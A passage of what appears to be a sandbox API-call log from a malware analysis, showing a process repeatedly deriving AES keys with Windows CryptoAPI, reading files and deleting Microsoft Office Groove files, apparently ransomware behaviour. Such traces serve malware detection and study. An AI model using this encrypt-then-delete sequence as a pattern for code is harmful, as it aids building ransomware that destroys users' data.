Algid=0x6610, hBaseData=0x284d6e8, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d628) returned 1 [0170.211] GetFileSize (in: hFile=0x528, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x739 [0170.211] ReadFile (in: hFile=0x528, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0170.220] CryptDestroyHash (hHash=0x284d6e8) returned 1 [0170.220] CryptDestroyKey (hKey=0x284d628) returned 1 [0170.220] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0170.222] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\TexturedBlue.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\texturedblue.css")) returned 1 [0170.224] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52810) returned 1 [0170.224] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0170.224] CryptHashData (hHash=0x284d668, pbData=0x9ed8a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0170.224] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d628) returned 1 [0170.224] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x733 [0170.225] ReadFile (in: hFile=0x4e8, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0170.247] CryptDestroyHash (hHash=0x284d668) returned 1 [0170.247] CryptDestroyKey (hKey=0x284d628) returned 1 [0170.247] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0170.248] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\VelvetRose.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\velvetrose.css")) returned 1 [0170.250] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52810) returned 1 [0170.251] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0170.251] CryptHashData (hHash=0x284d6e8, pbData=0x9ed8a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0170.251] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6e8, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d628) returned 1 [0170.251] GetFileSize (in: hFile=0x528, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xed [0170.251] ReadFile (in: hFile=0x528, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0170.252] CryptDestroyHash (hHash=0x284d6e8) returned 1 [0170.252] CryptDestroyKey (hKey=0x284d628) returned 1 [0170.252] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0170.254] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\_HELP.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\_help.txt")) returned 1 [0170.255] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0170.256] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0170.256] CryptHashData (hHash=0x284d728, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0170.256] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0170.256] GetFileSize (in: hFile=0x510, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x8f8 [0170.256] ReadFile (in: hFile=0x510, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0170.270] CryptDestroyHash (hHash=0x284d728) returned 1 [0170.270] CryptDestroyKey (hKey=0x284d668) returned 1 [0170.270] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0170.272] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsVersion1Warning.htm" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsversion1warning.htm")) returned 1 [0170.273] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0170.274] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0170.274] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0170.274] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0170.274] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1499 [0170.274] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0170.278] CryptDestroyHash (hHash=0x284d628) returned 1 [0170.278] CryptDestroyKey (hKey=0x284d668) returned 1 [0170.278] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0170.280] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsViewAttachmentIcons.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsviewattachmenticons.jpg")) returned 1 [0170.281] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0170.282] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0170.282] CryptHashData (hHash=0x284d728, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0170.282] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0170.282] GetFileSize (in: hFile=0x510, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x638 [0170.282] ReadFile (in: hFile=0x510, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0170.306] CryptDestroyHash (hHash=0x284d728) returned 1 [0170.306] CryptDestroyKey (hKey=0x284d668) returned 1 [0170.306] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0170.307] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsViewAttachmentIconsMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsviewattachmenticonsmask.bmp")) returned 1 [0170.309] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0170.310] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0170.310] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0170.310] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0170.310] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x164a [0170.310] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0170.317] CryptDestroyHash (hHash=0x284d628) returned 1 [0170.317] CryptDestroyKey (hKey=0x284d668) returned 1 [0170.317] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0170.319] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsViewFrame.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsviewframe.html")) returned 1 [0170.321] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0170.321] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0170.321] CryptHashData (hHash=0x284d728, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0170.321] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0170.321] GetFileSize (in: hFile=0x510, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xadf [0170.322] ReadFile (in: hFile=0x510, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0170.334] CryptDestroyHash (hHash=0x284d728) returned 1 [0170.334] CryptDestroyKey (hKey=0x284d668) returned 1 [0170.334] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0170.335] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsViewTemplate.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsviewtemplate.html")) returned 1 [0170.337] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0170.337] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0170.337] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0170.337] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0170.337] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1bfb [0170.337] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0170.343] CryptDestroyHash (hHash=0x284d628) returned 1 [0170.343] CryptDestroyKey (hKey=0x284d668) returned 1 [0170.343] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0170.344] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormToolImages.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formtoolimages.jpg")) returned 1 [0170.346] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0170.347] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0170.347] CryptHashData (hHash=0x284d728, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0170.347] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0170.347] GetFileSize (in: hFile=0x510, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2577 [0170.347] ReadFile (in: hFile=0x510, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0170.350] CryptDestroyHash (hHash=0x284d728) returned 1 [0170.350] CryptDestroyKey (hKey=0x284d668) returned 1 [0170.350] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0170.351] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\form_edit.js" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\form_edit.js")) returned 1 [0170.353] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0170.353] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0170.353] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0170.353] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0170.353] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xa52f [0170.353] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0170.368] CryptDestroyHash (hHash=0x284d628) returned 1 [0170.368] CryptDestroyKey (hKey=0x284d668) returned 1 [0170.368] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0170.369] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\macroprogress.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\macroprogress.gif")) returned 1 [0170.371] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0170.372] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0170.372] CryptHashData (hHash=0x284d728, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0170.372] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0170.372] GetFileSize (in: hFile=0x510, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x21e5 [0170.372] ReadFile (in: hFile=0x510, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0170.388] CryptDestroyHash (hHash=0x284d728) returned 1 [0170.388] CryptDestroyKey (hKey=0x284d668) returned 1 [0170.388] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0170.390] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\PublicFunctions.js" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\publicfunctions.js")) returned 1 [0170.391] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0170.392] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0170.392] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0170.392] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0170.392] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x350 [0170.392] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0170.486] CryptDestroyHash (hHash=0x284d628) returned 1 [0170.486] CryptDestroyKey (hKey=0x284d668) returned 1 [0170.486] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0170.488] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\rtf_alignleft.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\rtf_alignleft.gif")) returned 1 [0170.489] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0170.490] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0170.490] CryptHashData (hHash=0x284d728, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0170.490] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0170.490] GetFileSize (in: hFile=0x510, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x34f [0170.490] ReadFile (in: hFile=0x510, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0170.498] CryptDestroyHash (hHash=0x284d728) returned 1 [0170.498] CryptDestroyKey (hKey=0x284d668) returned 1 [0170.498] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0170.499] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\rtf_alignright.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\rtf_alignright.gif")) returned 1 [0170.501] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0170.502] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0170.502] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0170.502] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0170.502] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x365 [0170.502] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0170.504] CryptDestroyHash (hHash=0x284d628) returned 1 [0170.504] CryptDestroyKey (hKey=0x284d668) returned 1 [0170.504] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0170.506] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\rtf_bullets.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\rtf_bullets.gif")) returned 1 [0170.507] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0170.507] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0170.507] CryptHashData (hHash=0x284d728, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0170.507] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0170.507] GetFileSize (in: hFile=0x510, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x34f [0170.507] ReadFile (in: hFile=0x510, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0170.555] CryptDestroyHash (hHash=0x284d728) returned 1 [0170.556] CryptDestroyKey (hKey=0x284d668) returned 1 [0170.556] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0170.557] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\rtf_center.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\rtf_center.gif")) returned 1 [0170.559] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0170.559] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0170.559] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0170.559] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0170.560] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3ec [0170.560] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0170.562] CryptDestroyHash (hHash=0x284d628) returned 1 [0170.562] CryptDestroyKey (hKey=0x284d668) returned 1 [0170.562] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0170.564] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\rtf_choosecolor.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\rtf_choosecolor.gif")) returned 1 [0170.566] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0170.566] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0170.566] CryptHashData (hHash=0x284d728, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0170.566] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0170.566] GetFileSize (in: hFile=0x510, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x37a [0170.566] ReadFile (in: hFile=0x510, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0170.569] CryptDestroyHash (hHash=0x284d728) returned 1 [0170.569] CryptDestroyKey (hKey=0x284d668) returned 1 [0170.569] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0170.570] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\rtf_choosefont.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\rtf_choosefont.gif")) returned 1 [0170.572] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0170.573] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0170.573] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0170.573] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0170.573] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x35f [0170.573] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, 